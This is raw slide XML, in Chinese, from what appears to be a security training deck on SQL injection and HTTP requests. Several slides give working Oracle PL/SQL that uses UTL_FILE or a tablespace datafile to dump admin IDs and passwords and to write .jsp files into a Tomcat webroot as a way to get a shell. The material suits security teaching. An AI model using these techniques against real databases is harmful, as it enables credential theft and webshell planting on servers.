              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle高级注入：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、友情备份</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用UTL_FILE友情备份：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建目录：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace directory cux_log_dir as 'E:/soft/apache-</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tomcat-7.0.37/webapps/ROOT/selina';  </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CS交互安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request &amp; Response(请求与响应)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求和响应在Web开发当中没有语言之分不管是ASP、PHP、ASPX还是JAVAEE也</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>好，Web服务的核心应该是一样的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在我看来Web开发最为核心也是最为基础的东西就是Request和Response！我们</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的Web应用最终都是面向用户的，而请求和响应完成了客户端和服务器端的交互。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>服务器的工作主要是围绕着客户端的请求与响应的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下图我们通过Tamper data拦截请求后可以从请求头中清晰的看到发出请求的客</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>户端请求的地址为：localhost。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浏览器为FireFox，操作系统为Win7等信息，这些是客户端的请求行为，也就是</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>Request。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Oracle高级注入：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>1、友情备份</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用UTL_FILE友情备份：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>导出数据到文件：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>declare</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    frw   utl_file.file_type;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    begin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        frw:=utl_file.fopen('CUX_LOG_DIR','emp.txt','w');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        for rec in (select * from admin) loop</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>            utl_file.put_line(frw,rec.id||','||rec.password);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        end loop;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        utl_file.fclose(frw);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    end;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3024505" y="424815"/>
            <a:ext cx="5333365" cy="421894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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在有Oracle连接权限没有webshell时候通过utl_file获取shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（当然用户必须的具有创建DIRECTORY的权限）:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace directory getshell_dir as 'E:/soft/apache-</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tomcat-7.0.37/webapps/SqlInjection/';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>当然了as后面跟的肯定是你的WEB路径。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1909445"/>
            <a:ext cx="3552190" cy="866775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行以下SQL语句：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>创建目录：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create or replace directory getshell_dir as 'E:/soft/apache-</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>tomcat-7.0.37/webapps/SqlInjection/';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写入shell到指定目录：注意directory在这里一定要大写:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写入shell到指定目录：注意directory在这里一定要大写:</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>declare</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    frw   utl_file.file_type;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    begin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        frw:=utl_file.fopen('GETSHELL_DIR','yzmm.jsp','w');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        utl_file.put_line(frw,'hello world.');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        utl_file.fclose(frw);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    end;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1681480" y="738505"/>
            <a:ext cx="5781040" cy="366649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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在低权限下getshell： </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090930" y="1424940"/>
            <a:ext cx="6425565" cy="3656330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GetShell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>执行以下SQL创建表空间：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>create tablespace shell datafile 'E:/soft/apache-tomcat-</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>7.0.37/webapps/SqlInjection/shell.jsp' size 100k nologging ;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CREATE TABLE SHELL(C varchar2(100)) tablespace shell;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>insert into SHELL values('hello world');</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>commit;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>alter tablespace shell offline;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
